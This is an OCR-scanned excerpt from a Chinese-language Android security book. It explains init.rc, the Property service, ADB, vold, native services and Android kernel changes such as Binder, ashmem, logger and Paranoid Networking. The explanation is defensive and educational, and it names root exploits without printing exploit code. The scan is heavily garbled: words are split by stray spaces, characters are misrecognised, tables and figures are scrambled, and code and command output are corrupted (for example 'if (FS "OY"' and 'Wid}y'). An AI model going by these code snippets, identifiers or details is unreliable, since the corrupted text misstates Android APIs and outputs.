许可 证 (GPL ) 授权 问题 。 这 些 差异 也 带 来 了 少许 代价 。Bionic 的 libc 并 不 像 GNU Lipc 那么 
完整 ， 甚 至 比 不 上 Bionic 源头 的 BSD 1ipc 实现 。Bionic 中 也 包含 了 大 量 自己 的 代码 , 为 了 努力 
降低 C 运 行 时 库 的 内 存 使 用 空间 , Android 开发 者 还 实现 了 一 个 自 定义 的 动态 链接 器 和 线程 API。 

这 些 库 是 使 用 原生 代码 开发 的 ,因而 很 容易 出 现 内 存 破坏 漏洞 ,这 使 得 该 层 成 为 探索 Android 
安全 性 时 的 一 个 特别 有 趣 的 部 分 。 

2. 核心 服务 

核心 服务 是 指 建 立 基本 操作 系统 环境 的 服务 与 Android 原生 组 件 。 这 些 服务 包括 初始 化 用 户 
空间 的 服务 (如 init )、 提 供 关 键 调试 功能 的 服务 (如 adbd 和 debugggerd ) 等 。 注 意 ， 某 些 核心 
服务 可 能 是 硬件 或 版 本 特定 的 ， 本 节 当 然 不 能 详尽 描述 所 有 的 用 户 空间 服务 。 

init 

init 程序 通过 执行 一 系列 命令 对 用 户 空间 环境 进行 初始 化 。 然 而 ，Android 使 用 自 定义 的 init 
实现 。 代 蔡 从 /etc/init.d 路 径 执 行 基于 运行 级 别 的 shell 脚本 ，Android 基于 从 /initrc 中 找到 的 指令 
来 执行 命令 。 对 于 设备 特定 的 指令 ， 可 能 存在 一 个 名 为 /init.[hwl].re 的 文件 ,这 里 [hw] 是 特定 设备 
的 硬件 代号 。 以 下 是 HTC One V 手机 上 /init.rc 文件 中 的 内 容 代 码 片 段 。 


service dbus /system/bin/dbus-daemon --system --nofork 
class main 
socket dbus stream 660 bluetooth bluetooth 
user bluetooth 
group bluetooth net_bt_admin 
































































































































service bluetoothd /system/bin/bluetoothd -n 
class main 
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socket bluetooth stream 660 bluetooth bluetooth 
socket dbus_bluetooth stream 660 bluetooth bluetooth 


# init.rc does not yet support applying capabilities, so run as root and 
# let bluetoothd drop uid to bluetooth with the right linux capabilities 
group bluetooth net_bt_ admin misc 
disabled 


service bluetoothgd_ one /system/bin/bluetoothd -n 
class main 
socket bluetooth stream 660 bluetooth bluetooth 
socket dbus_bluetooth stream 660 bluetooth bluetooth 
# init.rc does not yet support applying capabilities, so run as root and 
# let bluetoothd drop uid to bluetooth with the right linux capabilities 
group bluetooth net_bt_admin misc 
disabled 
oneshot 
# Discretix DRM 
service dx_drm server /system/bin/DxDrmServerIpc -f -o allow other \ 
/data/DxDrm/fuse 


on property:ro.build.tags=test-keys 
start htc_ebdlogd 


on property:ro.build.tags=release-keys 
start htc_ebdlogd_ rel 


service zchgd_offmode /system/bin/zchgd -pseudooffmode 
user root 
group root graphics 
disabled 


这 些 初始 化 脚本 指定 几 个 任务 ， 包括: 
口 通过 service 指令 ， 启 动 在 开机 时 应 该 运行 的 服务 或 守护 进程 ; 
口 通过 每 个 服务 条 目下 缩 进 的 参数 ， 指 定 服务 应 该 在 哪个 用 户 和 用 户 组 环境 下 运行 ; 
口 设置 向 Property 服务 公开 的 系统 范围 属性 与 配置 选项 ; 
口 通过 on 指令 , 注册 在 特定 事件 发 生 时 ， 如 修改 系统 属性 或 装载 文件 系统 ， 要 执行 的 动作 
或 命令 。 

Property 服务 

Property 服务 位 于 Android 的 初始 化 服务 中 ， 它 提供 了 一 个 持续 性 的 ( 每 次 启动 )、 内 存 映射 
的 、 基 于 键 值 对 的 配置 服务 。 许 多 操作 系统 和 框架 层 的 组 件 都 依赖 于 这 些 属性 ， 其 中 包括 网 络 接 
口 配置 、 无 线 电 选 项 甚至 安全 相关 设置 ， 其 中 的 细节 将 在 第 3 章 中 讨论 。 

属性 可 以 通过 多 种 方式 进行 读 取 和 设置 。 例 如 ， 分 别 使 用 命令 行 实用 程序 getprop 和 
setProp 进行 读 取 和 设置 ， 在 原生 代码 中 分 别 使 用 1ibcutils 库 中 的 property_get 和 
property_set 函数 以 编程 方式 读 取 和 设置 ， 或 使 用 android.os.SystemPproperties 类 
以 编程 方式 读 取 和 设置 ( 这 个 类 函数 又 会 继续 调用 上 述 原生 孔 数 )。Propery 服务 的 概述 如 图 
2-2 所 示 。 
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属性 设置 器 





Unix 域 套 接 字 
读 取 写 入 加 载 


2-2 ” Android 系统 的 Property 服务 


在 Android 设备 (在 本 例 中 是 一 台 HTC One V 手机 ) 上 运行 getprop 命令 ， 可 以 看 到 输出 
结果 中 包含 DalvikVM 配置 、 当 前 设置 壁纸 、 网 络 接口 配置 设置 和 厂商 特定 的 更 新 URL 等 。 


root@android:/ # getprop 





dalvik.vm.dexopt-flags]: [m=y] 
dalvik.vm.heapgrowthlimit]: [48m] 
dalvik.vm.heapsize]: [128m] 

dhcp .wlan0.dns1] ELT92. T6882 Ld 

dhcp .wlan0.dns2]: [] 

dhcp .wlan0.dns3] [] 

dhcp .wlan0.dns4]: [] 

dhcp .wlan0.gateway]: [192.168.1.1] 
dhcp .wlan0.ipaddress]: [192.168.1.125] 


dhcp .wlan0.leasetime]: [7200] 


ro.htc.appupdate.exmsg.url]: 
[http://apu-msg.htc.com/extra-msg/rws/and-app/msg] 
ro.htc.appupdate.exmsg.url_CN]: 
[http://apu-msg.htccomm.com.cn/extra-msg/rws/and-app/msg] 
ro.htc.appupdate.urll]: 
[http://apu-chin.htc.com/check-in/rws/and-app/updatel] 


service.brcm.b 
service.brcm.b 


.activation]: [0] 
.avrcp_pass_thru]: [0] 


被 设置 为 “只 读 ” 的 一 些 属性 不 可 更 改 , 即便 是 root 用 户 ( 尽管 有 一 些 设备 特有 的 例外 情况 )。 
这 些 属性 以 ro 为 前 级 。 
[ro.secure]: [0] 


[ro.serialno]: [HT26MTV01493] 
[ro.setupwizard.enterprise mode]: [1] 
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[ro.setupwizard.mode]: [DISABLED] 

[ro.sf.1Llcaq_dqensity]: [240] 

[ro.telephony.default_ network]: [0] 
[ro.use_ data netmgrd]: [true] 

[ro.vendor.extension library]: [/system/l1ib/libqc-opt.so] 
你 会 在 第 3 章 读 到 更 多 关于 Property 服务 及 其 安全 影响 的 细节 。 
无 线 接口 层 


将 在 第 11 章 中 详细 介绍 的 无 线 接口 层 (RIL ), 为 智能 手机 提供 了 手机 本 身 应 该 有 通讯 功能 。 
如 果 没 有 这 个 组 件 ，Android 设备 将 无 法 拨打 电话 ， 发 送 或 接收 短信 ， 或 者 在 没有 Wi-Fi 网 络 时 
上 网 。 因 此 ， 它 会 在 任何 拥有 蜂窝 数据 或 电话 功能 的 Android 设备 上 运行 。 

debuggerd 

Android 的 基本 前 溃 报 告 功 能 是 由 一 个 称 为 debuggerd 的 守护 进程 提供 的 ， 当 调试 器 守护 进 
程 启动 时 ， 它 将 打开 到 Android 日 志 功 能 的 一 个 连接 ， 然 后 在 一 个 抽象 名 字 空 间 套 接 字 开始 监听 
客户 端的 连 入 。 每 次 程序 开始 运行 ， 链 接 器 会 安装 信号 处 理 程 序 ， 然 后 处 理 某 些 信 号 。 

当 要 捕获 的 某 个 信号 发 生 时 ， 内 核 执 行 信号 处 理 函数 debugger_signal_handler。 这 个 
函数 连接 到 之 前 提 到 的 由 DEBUGGER_SOCKET_NAME 定义 的 套 接 字 上 ,连接 之 后 , 链接 器 将 通知 
套 接 字 的 男 一 端 ( 即 debuggerd ) 目标 进程 已 经 甬 溃 了。 这 会 通知 debuggerd 应 该 调用 它 的 处 理 流 
程 并 创建 一 个 表演 报告 。 

ADB 

Android 调试 桥 ( ADB ) 是 由 几 个 部 件 组 成 的 ， 包 括 在 Android 设备 上 的 adbd 守护 进程 ,在 
宿主 工作 站 上 运行 的 adb 服务 器 ， 以 及 相应 的 adb 命令 行 客户 端 。adb 服务 器 管理 客户 端 与 在 目 
标 设备 上 运行 的 守护 进程 之 间 的 连接 , 便于 各 种 任务 操作 ， 比 如 执行 一 个 shell、 调试 应 用 ( 通过 
Java 调试 网 络 协议 )、 套 接 字 和 端口 转发 、 文 件 传输 ， 以 及 安装 /外 载 应 用 包 等 。 

作为 一 个 简单 的 例子 ， 你 可 以 运行 aab devices 命令 来 列 出 你 连接 的 设备 。 因 为 ADB 在 
我 们 的 主机 上 尚未 运行 ,因此 它 会 被 初始 化 , 在 5037/tcp 上 监听 客户 端 连接 。 然 后 你 可 以 通过 序 
列 号 来 指明 一 个 目标 设备 , 并 运行 adb shel1 命令 , 这 会 获得 一 个 在 设备 上 运行 的 命令 行 shell。 

gs adb devices 

* daemon not running. starting it now on port 5037 * 
* daemon started successfully * 

List of devices attached 


DO25A0A024441MGK device 
HT26MTV01493 device 




















































































































$ adb -s HT26MTV01493 shell 
root@Qandroid:/ # 


通过 对 进程 列表 进行 grep 搜索 ( 此 例 中 使 用 pgrep ) 也 可 以 看 到 ，ADB 守护 进程 adbd 已 在 
目标 设备 上 运行 。 

root@android:/ # busybox pgrep -1 adbd 

2103 /sbin/adbd 
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ADB 对 于 使 用 Android 设备 和 模拟 器 进行 开发 是 非常 关键 的 ,因此 我 们 将 在 本 书 中 频繁 使 用 
它 。 你 可 以 从 http://developer.android.com/tools/help/adb.html 找 到 如 何 使 用 aqb 命令 的 详细 信息 。 

Volume 守护 进程 
Volume 守护 进程 ,或 称 为 vold, 是 Android 系统 上 负责 安装 和 印 载 各 种 文件 系统 的 服务 。 例 一 
如 ,插入 SD 卡 时 ，vold 会 处 理 这 一 事件 ,检查 SD 卡 的 文件 系统 错误 ( 如 通过 启动 fsck ) 并 将 
SD 卡 安装 到 相应 的 路 径 ( 也 就 是 /mnt/sdcard )。 当 卡 被 用 户 取出 后 ，vold 会 印 载 目标 卷 。 

vold 也 处 理 Android Secure Container (ASEC ) 文件 的 安装 与 和 邱 载 。 当 应 用 包 存 储 到 FAT 等 
不 安全 的 文件 系统 上 时 ，ASEC 会 对 其 进行 加 密 处 理 。 它 们 会 在 应 用 加 载 时 通过 环 回 (loopback ) 
设备 进行 安装 ， 通 常 挂 接 到 /mnt/asec。 

不 透明 二 进 制 块 (OBB ) 也 是 由 vold 进行 安装 和 伸 载 的 。 这 些 文件 与 应 用 共同 打包 ， 以 存 
储 由 一 个 共享 密 钥 加 密 的 数据 。 然 而 与 ASEC 容 需 不 同 的 是 , 对 OBB 的 安装 和 弛 载 是 由 应 用 自 
身 而 非 系统 来 执行 的 .以 下 代码 片段 演示 了 使 用 supersecretKey 作为 共享 密 钥 创建 一 个 OBB 
的 过 程 。 

obbFile = "path/to/some/obbfile"; 

storageRef = (StorageManager) getSystemService (STORAGE_SERVICE ) ; 


storageRef .mountObb (obbFile, "SuperSecretKey", obbListener); 
obbContent = storageRef.getMountedObbPath (obbFile); 


鉴于 vold 是 以 root 身份 运行 的 ， 它 的 功能 和 潜在 的 安全 漏洞 都 让 它 成 为 一 个 诱 人 的 目标 。 
你 可 以 在 第 3 章 看 到 针对 vold 和 其 他 类 似 服 务 进行 特权 提升 攻击 的 详细 介绍 。 

其 他 服务 

在 许多 Android 设备 上 还 运行 着 许多 其 他 服务 ， 提 供 一 些 不 一 定 是 必需 的 额外 功能 ( 取决 于 
设备 和 服务 )。 表 2-2 重点 介绍 其 中 的 一 些 服务 、 它 们 的 用 途 及 在 系统 中 的 权限 级 别 (UID、GID 
和 运行 用 户 所 属 的 辅助 用 户 组 ， 这 些 会 在 系统 的 initrc 文件 中 指明 )。 


表 2-2 用 户 空间 的 原生 服务 




















































































































服 务 描 述 UID、GID 和 辅助 用 户 组 
nokta 在 Android 2.2 以 上 版 本 中 存在 ， 由 网 络 管理 服务 用 于 配置 网 络 UID: 0/root 
接口 ， 运 行 PPP 守护 程序 (pppd) 、 以 太 网 与 其 他 类 似 服 务 GID: 0/root 
mediaserver 负责 启动 媒体 相关 服务 ， 这 些 服务 包括 Audio Flinger、Media UID: 1013 /media 
Player Service、 Camera Service 和 Audio Policy Service GID: 1005 /audio 
用 户 组 : 1006 / camera 
1026/ drmpc 


3001 /net_bt admin 
3002 /net_bt 














3003 / inet 
3007 /net_ bw_acct 

dbus-daemon 管理 D-Bus 特有 的 IPC/ 消 息 传递 (主要 针对 非 Android 特有 的 ”UID: 1002 /bluetooth 

组 件 ) GID: 1002 /bluetooth 


用 户 组 : 3001 /net_bt admin 
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( 续 ) 
服务 描述 UID、GID 和 辅助 用 户 组 
installa 管理 设备 上 的 应 用 程序 包 安装 〈 以 程序 包 管理 器 的 名 义 ) ， 包括“ UID， 10127install 
对 应 用 程序 包 (APK) 中 Dalvik 可 执行 字 节 码 (DEX) 的 初始 优 GID: 1002 /install 
a 
{ 4.2 之 前 的 版 本 : 
UID: 0/root 
GID: 0/root 
keystors 负责 对 系统 上 键 值 对 的 安全 存储 (通过 用 户 定义 的 口令 进行 保护 ) ”UID: 1017 / keystore 
GID: 1017/keystore 
用 户 组 : 1026 / drmpc 
drmserver 提供 对 数字 版 权 保 护 的 底层 操作 ， 应 用 通过 与 高 层次 上 的 DRM UID: 1019/ drm 
程序 包 与 这 个 服务 进行 交互 GID: 1019/ dm 
用 户 组 : 1026 / drm rpc 
3003 / inet 
serviceman-ager ”作为 注册 /注销 应 用 服务 的 Binder IPC 端点 的 仲裁 者 UID: 1000/system 
GID: 1000/system 
surface-flinger 在 Android 4.0 以 上 版 本 中 存在 的 显示 合成 器 ， 负 责 创建 进行 演 ”UID: 1000 /system 
示 的 图 形 帧 、 屏 幕 ， 并 发 送 给 显示 卡 驱动 GID: 1000 /system 
Ueventd 在 Android 2.2 以 上 版 本 中 存在 的 用 户 空间 守护 程序 ， 处 理 系统 UID: 0 /root 
和 设备 事件 并 采取 相应 动作 ， 比 如 装载 恰当 的 内 核 模块 GID: 0/root 














如 前 所 述 ， 这 份 清单 并 不 详尽 。 对 比 定制 设备 与 Nexus 设备 的 进程 列表 、initrc 文件 以 及 文 
件 系统 ,通常 会 发 现 大 量 的 非 标准 服务 。 这 些 服务 非常 能 够 引起 人 的 兴趣 ， 因 为 它们 的 代码 质量 
与 Android 设备 中 的 核心 服务 无 法 相 比 。 


2.3.5 内核 


尽管 Android 的 根基 一 一 Linux 内 核 文档 相当 完备 而 且 已 经 被 深入 理解 ， 但 是 Linux 内 核 和 
Android 使 用 的 内 核 还 是 有 很 多 显著 的 差异 。 本 节 将 介绍 其 中 的 一 些 变化 , 特别 是 那些 和 Android 
安全 相关 的 。 

1. Android 分 支 

在 早期 , 谷歌 创建 了 Linux 内 核 的 一 个 Android 分 支 , 因为 许多 修改 和 添加 已 经 不 再 与 Linux 
内 核 主 代码 树 相互 兼容 。 总 体 而 言 ， 这 其 中 包括 了 大 约 250 个 补丁 , 涉及 文件 系统 支持 、 网 络 处 
理 调整 ， 以 及 进程 和 内 存 管理 功能 等 。 根 据 一 位 内 核 工程 师 的 说 法 ， 绝 大 部 分 的 补丁 “代表 着 
Android 开发 者 在 Linux 内 核 中 发 现 的 一 些 局 限 性 ”。2012 年 3 月 ，Linux 内 核 维护 者 将 Android 
特有 的 内 核 修 改 合并 到 了 主 代码 树 。 表 2-3 显示 了 一 些 对 主 代码 树 的 添加 与 修改 ,本 节 将 详细 介 
绍 其 中 的 一 部 分 。 
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表 2-3 Android 对 Linux 内 核 的 主要 修改 
































































































































内 核 修改 描 述 

Binder IPC 机 制 ， 提 供 额 外 的 一 些 特性 ， 比 如 对 调用 者 和 被 调用 者 的 安全 验证 。 它 已 被 大 量 的 系统 和 
框架 服务 所 使 用 

ashmem 匿名 共享 内 存 ， 一 种 基于 文件 的 共享 内 存 分 配器 ， 使 用 Binder IPC 来 允许 进程 识别 内 存 区 域 
文件 描述 符 

pmem 进程 内 存 分 配器 ， 用 于 管理 大 块 、 连 续 的 共享 内 存 区 域 

日 志 记 录 器 系统 范围 的 日 志 功 能 

RAM CONSOLE 在 内 核 错误 后 ， 在 RAM 中 存储 内 核 日 志 消 息 ， 以 便 查看 

OOM 修改 “Out Of Memory”-killer 在 内 存 空间 低 的 时 候 杀 掉 进程 ， 在 Android 分 支 中 ，OOM 在 内 存 即 
将 用 尽 时 ， 较 传统 Linux 内 核能 更 快 地 杀 掉 进程 

wakelocks 电源 管理 特性 ， 使 得 设备 进入 低 功 率 省 电 模式 ， 同 时 保持 可 响应 状态 

Alarm Timers AlarmManager 的 内 核 接口 ， 用 于 指示 内 核 调 度 “ 醒 来 ”时 间 

Paranoid Networking ”将 网 络 操作 和 功能 特性 限制 在 特定 的 用 户 组 ID 

timed output/gpio 允许 用 户 空间 程序 在 一 定时 间 后 修改 和 重 置 GPIO 寄存 器 

yaffs2 对 yaffs2 Flash 文件 系统 的 支持 

2. Binder 

















对 Android 的 Linux 内 核 最 为 重要 的 一 个 添加 也 许 是 Binder 驱动 。Binder 是 一 个 基于 
OpenBinder 修改 版 本 的 IPC 机 制 ，OpenBinder 最 初 由 Be 公司 开发 ， 后 来 又 由 Palm 公司 开发 和 

















维护 。Android 的 Binder 代码 量 相 对 较 小 ( 大约 有 4000 行 源码 ， 存 在 于 2 个 文件 中 )， 但 是 对 于 


大 部 分 的 Android 功能 都 是 非常 关键 的 。 














概括 地 说 ，Binder 内 核 驱动 是 整个 Binder 架构 的 粘 合剂 。Binder 作为 一 个 架构 ， 以 客户 端 一 
服务 融 模 型 运行 ， 允 许 一 个 进程 同时 调用 多 个 “远程 ”进程 中 的 多 个 方法 。Binder 架构 将 底层 细 









































节 进 行 了 抽象 , 使 得 这 些 方法 调用 看 起 来 就 像 是 本 地 函数 调用 。 图 2-3 显示 了 Binder 的 通信 流 








图 。 


Binder 也 使 用 进程 ID ( PID ) 和 UID 信息 作为 一 种 标识 调用 进程 的 手段 ,允许 被 调用 方 作出 








访问 控制 的 决策 。 通 常会 调用 Binqer.getcallingUid 和 Binder.getcallingpPid 等 函数 ， 


或 者 调用 checkcallingPermission 等 高 层次 上 的 检查 函数 。 





























在 实际 情况 中 会 遇 到 的 一 个 例子 是 ACCESS_SURFACE_FLINGER 权限 。 这 一 权限 通常 只 授予 
图 形 系统 用 户 ， 并 人 允许 访问 Surface Flinger 图 形 服务 的 Binder IPC 接口 。 此 外 ， 调 用 者 的 用 户 组 
成 员 关系 (以 及 随后 所 需要 的 权限 ) 会 通过 一 系列 对 前 述 函 数 的 调用 进行 检查 ， 如 以 下 代码 片段 


























所 示 。 


const int pid = ipc->getCallingPid(); 
const int uid = ipc->getCallingUid(); 
if ((uid != AID_ GRAPHICS) && 
!PermissionCache: :checkPermission(sReadFramebuffer, 
pid, Wid}y) 
ALOGE ("Permission Denial: " 
"can't read framebuffer pid=%d, uid=%d", pid, uid); 
return PERMISSION_DENIED; 





38 第 2 章 Android 的 安全 设计 与 架构 
































进程 A | | 代理 | 





















带 有 线程 的 进程 B 














图 2-3 Binder 的 通信 流 











在 更 高 的 层次 上 所 暴露 的 IPC 方法 ， 如 那些 由 绑 定 服务 所 提供 的 IPC 方法 ， 通 常会 通 
Android 接口 定义 语言 (AIDL ) 提炼 成 一 个 抽象 接口 。AIDL 允许 两 个 应 用 使 用 ee 
者 标准 化 的 接口 ， 来 发 送 和 接收 数据 ， 使 得 接口 独立 于 具体 的 实现 。AIDL 类 似 于 其 他 的 接口 定 

义 语言 文件 ， 比 如 C/C++ 中 的 头 文件 。 以 下 是 一 个 AIDL 代码 片段 的 示例 。 


// IRemoteService.aidl 
package com.example.android; 




















// 在 此 声明 任何 非 默认 类 型 导入 声明 


/** 范 例 服务 接口 */ 

interface IRemoteService { 
/xx 请 求 这 一 服务 的 进程 ID， 做 点 “有 趣 ” 的 事情 */ 
int getPid(); 


/** 显 示 一 些 用 作 AIDL 参数 和 返回 值 的 基本 类 型 */ 
void basicTypes (int anInt, long aLong, boolean aBoolean, 
float aFloat, 
double aDouble, String aString); 
} 


这 个 AIDL 的 例子 定义 了 一 个 简单 的 接口 一 IRemoteService， 包 含 两 个 方法 : getPiqd 和 
basicTypes。 如 果 一 个 应 用 绑 定 到 暴露 此 接口 的 服务 ， 随 之 就 可 以 在 Binder 支持 下 调用 前 面 提 
到 的 这 两 个 方法 。 

. ashmem 
名 共享 内 存 服务 ， 简 称 ashmem， 是 另 一 个 在 Linux 内 核 Android 分 支 中 添加 的 代码 模块 。 
ashmem em 驱动 基 本 上 提供 了 基于 文件 、 通 过 引用 计数 的 共享 内 存 接口 。 它 广泛 应 用 于 大 多 数 
Android 核心 组 件 中 ， 包 括 Surface Flinger、Audio Flinger、 系 统 服务 器 和 DalvikVM 等 。ashmem 
能 够 自动 收缩 内 存 缓存 ， 并 在 全 局 可 用 内 存 较 低 时 回收 内 存 区 域 ， 因 而 非常 适用 于 低 内 存 环境 。 

在 底层 使 用 ashmem 很 简单 ， 只 需 调 用 ashmem_create_region 并 对 返回 的 文件 描述 符 使 
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用 mmap 函数 : 
int fd = ashmem create region("SomeAshmem", size); 
if (FS "OY" 


data = mmap (NULL, size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0); Eu 


在 较 高 层次 上 ，Android 框架 层 中 提供 了 MemoryFile 类 ， 作 为 ashmem 驱动 的 封装 器 。 此 
外 ,进程 可 以 使 用 Binder 机 制 在 以 后 共享 这 些 内 存 对 象 ， 并 利用 Binder 的 安全 特性 来 限制 访问 。 
作为 一 起 安全 事件 ,在 2011 年 年 初 ，ashmem 被 证 明 存在 一 个 非常 严重 的 安全 缺陷 ， 人 允许 通过 
Android 属性 进行 特权 提升 ， 关 于 这 一 点 ， 我 们 将 在 第 3 章 中 进行 详细 介绍 。 

4. pmem 

另 一 个 Android 特有 的 自 定 义 驱动 是 pmem， 用 来 管理 1~16MB (或 更 多 ,取决 于 具体 实现 ) 
的 大 块 物理 上 连续 的 内 存 区 块 。 这些 区 块 是 特殊 的 ， 可 以 在 用 户 空间 进程 和 其 他 内 核 驱 动 ( 比如 
GPU 驱动 ) 之 间 共 享 。 与 ashmem 不 同 的 是 ，pmem 驱动 需要 一 个 分 配 进程 ， 为 pmem 的 内 存 堆 
保留 一 个 文件 描述 符 ， 直 到 所 有 其 他 索引 都 关闭 。 

5. 日 志 记录 器 

虽然 Android 内 核 仍然 维护 自己 基于 Linux 内 核 的 日 志 机 制 ， 但 它 也 使 用 另 一 个 日 志 记录 子 
系统 ， 即 俗称 的 “日 志 记 录 器 ”(logger )。 作 为 1ogcat 命令 的 支持 ， 这 个 驱动 用 于 查看 日 志 绥 
冲 区 。 它 根据 信息 的 类 型 ， 提 供 了 4 个 独立 的 日 志 缓冲 区 : main ( 主 缓冲 区 )、radio (无 线 电 
缓冲 区 )、event (事件 缓冲 区 ) 与 system (系统 缓冲 区 )。 图 2-4 显示 了 日 志 事 件 的 流 图 以 及 
辅助 日 志 记 录 器 的 组 件 。 



















































































Android 日 志 记 录 系 统 概览 


目标 
J 
ava 程 序 System.out 


/System.err 



























com.android.inter 


Eclipse 中 的 ADT 


adbserver 


adb logcat 








内 核 



















/dev/log/main 
/dev/log/radio 
/dev/log/event 
/dev/log/system 


/dev/log/main 
/dev/log/radio 
/dev/log/event 
/dev/log/system 












图 2-4 Android 日 志 记 录 系 统 架 构 
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主 缓冲 区 通常 是 


android.util.Log 类 














日 志 数 量 最 大 的 ， 并 且 是 应 用 相关 事件 的 日 志 源 。 应 用 通常 从 
类 中 调用 一 个 方法 ,而 调用 的 方法 对 应 于 不 同 的 日 志 条 目 优 先 级 别 , 例如 ， 











i 方法 记录 “信息 性 ”日 志 ，Log .ad 方法 记录 “调试 ”日 志 ， 而 Log.e 方法 记录 “错误 ” 


日 志 (很 像 syslog )。 

















系统 缓冲 区 也 是 许多 信息 的 来 源 , 即 由 系统 进程 生成 的 系统 级 事件 。 这 些 进程 利用 android. 
util.Slog 类 中 的 println native 方法 ， 而 println native 方法 又 会 调用 特定 的 原生 代 
码 ,将 日 志 写 人 这 个 缓冲 区 。 
志 消 息 可 以 使 用 logcat 命令 来 获取 ， 而 主 缓冲 区 与 系统 缓冲 区 作为 默认 的 日 志 信 息 源 。 





在 以 下 代码 中 ， 我 们 i 


S adb -qd logcat 





运行 adb -qd logcat 命令 , 来 看 看 连接 的 设备 上 发 生 了 什么 。 


一 一 一 一 一 一 一 一 一 beginning of /dev/log/system 


D/MobileDataSta 


teTracker( 1600): null: Broadcast received 


ACTION_ANY_DATA_CONNECTION_STATE_CHANGEDmApnType=nul1 != received 


apnType=internet 


D/MobileDatasta 


ACTION_ANY_DATA 


apnType=interne 
D/MobileDataSta 


ACTION_ANY_DATA 


apnType=interne 
D/MobileDataSta 








ACTION_ANY_DATA 


apnType=interne 





teTracker( 1600): null: Broadcast received: 
CONNECTION_STATE_CHANGEDmMApnType=null != received 


teTracker( 1600): httpproxy: Broadcast received: 
CONNECTION_STATE_CHANGEDmApnType=httpproxy != received 








teTracker( 1600): null: Broadcast received: 
CONNECTION_STATE_CHANGEDmMApnType=null != received 





一 一 一 一 一 一 一 一 一 beginning of /dev/log/main 


D/memalloc( 1743): /dev/pmem: Unmapping buffer base:0x5396a000 
size:12820480 offset:11284480 

D/memalloc( 1743): /dev/pmem: Unmapping buffer base:0x532f8000 
size:1536000 offset:0 

D/memalloc( 1743): /dev/pmem: Unmapping buffer base:0x546e7000 
size:3072000 offset:1536000 

D/libEGL ( 4887): loaded /system/lib/egl/l1ibGLESvVv1_ CM adreno200.so 
D/libEGL ( 4887): loaded /system/lib/egl/l1ibGLESVv2_adreno200.so 
I/Adreno200-EGLSUB( 4887): <ConfigWindowMatch:2078>: Format RGBA 8888. 
D/OpenGLRenderer( 4887): Enabling debug mode 0 

V/chromium( 4887): external/chromium/net/host_resolver_ helper/host_ 


resolver_helper. 


DNSPreResolver: 


cc:66: [0204/172737:INFO:host_resolver_helper.cc(66)] 
:Init got hostprovider:0x5281d220 


V/chromium( 4887): external/chromium/net/base/host_resolver_impl.cc:1515: 
[0204/172737:INFO:host_resolver_impl.cc(1515)] 
HostResolverIimpl::SetPreresolver preresolver:0x013974d8 


V/WebRequest( 4 


887): WebRequest::WebRequest, setPriority = 0 


I/InputManagerService( 1600): [unbindCurrentClientLocked] Disable input 


method client. 


I/InputManagerService( 1600): [startIinputLocked] Enable input 


method client. 


V/chromium( 4887): external/chromium/net/disk_ cache/ 
hostres_plugin bridge.cc:52: [0204/172737:INFO:hostres_ 
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plugin_ bridge.cc(52)] StatHubCreateHostResPlugin initializing.. . 























这 个 1ogcat 命令 是 如 此 常用 ， 以 至 于 ADB 为 在 目标 设备 上 运行 它 提供 了 一 个 快捷 方式 。 
在 整 本 书 中 ， 我 们 会 大 量 使 用 logcat 命令 来 监视 进程 和 整个 系统 的 状态 。 

6. Paranoid Networking 

Android 内 核 基于 一 个 调用 进程 的 辅助 用 户 组 来 限制 网 络 操作 ， 而 这 个 调用 进程 就 是 被 称 为 
Paranoid Networking 的 内 核 修改 模块 。 在 高 层次 上 ， 这 个 模块 将 一 个 AID 〈 以 及 随后 的 GID ) 映 
射 到 应 用 层 的 权限 声明 或 请 求 上 。 例 如 ,Manifest 文 件 中 的 权限 androig.permission.INTERNET 
有 效 地 映射 到 AID_INET AID (或 GID 3003 ) 上 。 这 些 用户 组 、UID 以 及 它们 相应 的 权能 在 内 核 
源码 树 的 include/linux/android aid.h 文件 中 定义 ， 详 见 表 2-4。 






























































表 2-4 根据 用 户 组 定义 的 网 络 权能 






































AID 定义 用 户 组 ID 和 名 称 权 能 
AID_NET_BT_ADMIN 3001 /net_bt_admin 允许 创建 任意 蓝牙 套 接 字 ， 以 及 可 以 诊断 和 管理 蓝牙 连接 
AID_NET_BT 3002 /net bt 允许 创建 SCO、RFCOMM 或 L2CAP (蓝牙 ) 套 接 字 
AID_INET 3003 /inet 允许 创建 AF_INET 或 AF_INET6 套 接 字 
AID_NET_RAW 3004 /net Taw 人 允许 使 用 RAW 和 了 PACKET 套 接 字 
AID_NET_ADMIN 3005 /net_ admin 授予 CAP_NET_ADMIN 权能 ， 人 允许 对 网 络 接口 、 路 由 表 和 套 接 字 的 
操纵 


你 可 以 从 AOSP 代码 库 中 的 system/core/include/private/android filesystem_ config.h 文件 中 找 
到 其 他 Android 特有 的 GID。 


2.4 复杂 的 安全 性 ， 复 杂 的 漏洞 利用 


在 仔细 观察 了 Android 的 设计 与 架构 之 后 ， 我 们 已 经 清楚 地 了 解 到 ，Android 操作 系统 是 一 
种 非常 复杂 的 系统 。 设 计 者 坚持 了 最 低 权 限 原 则 , 也 就 是 说 任何 特定 组 件 都 应 该 只 能 访问 它 真正 
所 需要 访问 的 东西 。 在 本 书 中 ,你 将 看 到 他 们 使 用 这 一 原则 的 大 量 证 据 。 不 过 ,这 虽然 有 助 于 提 
高 安全 性 ， 却 也 增加 了 复杂 性 。 

进程 隔离 和 减少 特权 往往 是 安全 系统 设计 中 的 基石 。 无 论 对 于 开发 者 还 是 攻击 者 , 这 些 技术 
的 复杂 性 也 让 系统 都 变 得 更 加 复杂 ,从 而 增加 两 方 的 开发 成 本 。 当 攻击 者 在 打磨 他 的 攻击 工具 时 ， 
他 必须 花 时 间 去 充分 了 解 问题 的 复杂 性 。 对 于 像 Android 这 样 一 个 系统 , 单单 攻击 一 个 安全 漏洞 ， 
可 能 不 足以 获取 到 系统 的 完全 控制 权 。 攻 击 者 可 能 需要 利用 多 个 安全 漏洞 才能 达到 目的 。 总 之 ， 
要 成 功 地 攻击 一 个 复杂 系统 ， 需 要 一 个 复杂 的 漏洞 利用 。 

一 个 能 够 很 好 地 说 明 这 一 点 的 真实 例子 是 ， 用 于 root HTC J Butterfly 手机 的 “diaggetroot” 
漏洞 利用 。 为 了 获取 root 访问 控制 权 , 它 利 用 了 多 个 互 为 补充 的 安全 问题 。 这 个 特殊 的 漏洞 利用 
会 在 第 3 章 中 详细 讨论 。 
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2.5 小结 





本 章 概述 了 Android 安全 设计 和 架构 。 我 们 引入 了 Android 沙 箱 及 Android 使 用 的 权限 模型 ， 
